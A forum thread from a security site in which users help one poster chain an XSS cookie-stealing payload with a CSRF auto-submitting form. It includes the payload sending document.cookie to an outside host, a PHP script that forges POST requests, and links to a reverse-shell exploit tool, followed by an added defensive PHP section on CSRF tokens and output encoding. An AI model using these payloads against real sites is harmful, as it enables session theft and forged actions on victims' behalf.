EH-Net
Author Topic: CSRF with XSS payload encoding help  (Read 4165 times)
eyenit0
Jr. Member
« on: August 02, 2012, 02:13:18 PM »

Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden HTML form that's auto-submitted by JavaScript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL-encode the quotes because then they get double-encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multipart/form-data, but no luck. The CSRF-vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an HTTP POST request with JavaScript to submit it, but I'm not sure how.

Any input is appreciated!
unicityd
Full Member
Bored IT Manager, Crypto Nerd
« Reply #1 on: August 02, 2012, 02:19:07 PM »

Will any of the URL shortening services accept it?

BS in IT, CISSP, MS in IS Management (in progress)
eyenit0
Jr. Member
« Reply #2 on: August 02, 2012, 11:32:16 PM »

Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.

unicityd
Full Member
Bored IT Manager, Crypto Nerd
« Reply #3 on: August 03, 2012, 02:50:15 AM »

No; they won't work with POST requests. There are other websites that will submit a POST for you though.

http://tomengineering.tripod.com/gettopost.html
http://get-to-post.nickj.org/

BS in IT, CISSP, MS in IS Management (in progress)
ambient
Newbie
« Reply #4 on: November 07, 2012, 01:57:59 AM »

You could implement it with the CSRF redirector technique.
I posted it here, but the source code is no longer available.

http://pornsookk.wordpress.com/2011/07/08/csrf-redirector/

Code:
<html>
<title>PHP CSRF Redirector</title>
<body>
<?php
/*   Call
 *   http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345
 */

$csrf   = $_GET['csrf'];

// Everything before the first '?' is the target URL, the rest is the field list
$tokens = preg_split('/\?/', $csrf);

$url    = $tokens[0];

// Fields are separated by '|' and given as key=value
$vars   = preg_split('/\|/', $tokens[1]);

// Note: $url and the field names/values are written into the markup unescaped
print('<form name="csrfForm" method="post" action="' . $url . '">');

for ($i = 0; $i < sizeof($vars); $i++) {
    /* $vars[$i]:  key=value;
     * key   = terms[0]
     * value = terms[1]
     */
    $terms = explode('=', $vars[$i]);
    print('<input type="hidden" name="' . $terms[0] . '" value="' . $terms[1] . '" />');
} // end for loop

print("</form>");
?>

<script language="javascript" type="text/javascript">
  document.forms[0].submit();
</script>
</body>
</html>
« Last Edit: November 07, 2012, 03:40:42 AM by ambient »

MaXe
Hero Member
I've just upgraded myself to a cyborg muahahaa!!1
« Reply #5 on: November 07, 2012, 02:49:53 AM »

Take a look at: www.intern0t.org/xssor/ for encoding methods.

Take a look at: http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ for a real world Proof of Concept (and former 0day).

The actual tool is available via: http://www.exploit-db.com/sploits/evilwebtool.tar.gz, where trojan.js contains the JavaScript payload. (Note that the Python tool reads PHP code or the reverse PHP shell (from pentestmonkey) and parses it into the trojan file before serving it.)

It took some clever encoding, but it works 100% (tested in Firefox) and has been used in a few demos that I've made. Knowing JavaScript, HTML and attack vectors within these, including various encoding methods, will be sufficient to pull off any XSS attack, even defeating anti-CSRF tokens.

The trojan.js file bypasses the built-in CSRF protection in vBulletin as well. It's probably the best PoC that I have ever made, hehe.

I'm an InterN0T'er
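The anti-CSRF token point raised in the last reply, as an added defensive example that is not part of the thread: a PHP synchronizer-token check shows why the forged hidden form from the first post is rejected (it cannot carry the victim's token), why a script already running in the origin still undermines the token, and the attribute encoding that renders the quoted <img onerror> payload inert. The function names csrf_token, csrf_valid and attr are my own.

```php
<?php
// Added defensive example, not code from the thread. Function names are my own.

// Issue a per-session synchronizer token. An auto-submitting form hosted on
// another origin cannot read the victim's session or page, so the forged
// POST cannot carry this value.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Verify the submitted token in constant time. Missing, empty or mismatching
// tokens are rejected before any state change happens.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Encode a value for an HTML attribute. The quotes and angle brackets of the
// payload become entities, so the browser treats it as text, not markup.
// This is the fix for the XSS itself; the token only addresses CSRF, and a
// script already running in the origin can simply read the token off the page.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed demonstration using the payload quoted in the first post.
$session = [];
$token   = csrf_token($session);
$payload = '<img src="#" onerror="javascript:document.location=\'http://site/?\'+document.cookie">';

// Forged cross-site POST: carries the payload but no token, so it is rejected.
$forged = ['comment' => $payload];
var_dump(csrf_valid($session, $forged));

// Legitimate same-site POST: the page embedded the token, so it is accepted.
$legit = ['comment' => 'hello', 'csrf_token' => $token];
var_dump(csrf_valid($session, $legit));

// If the payload had been stored anyway, encoding it on output keeps it inert.
echo '<input type="text" name="comment" value="' . attr($payload) . '">', "\n";
```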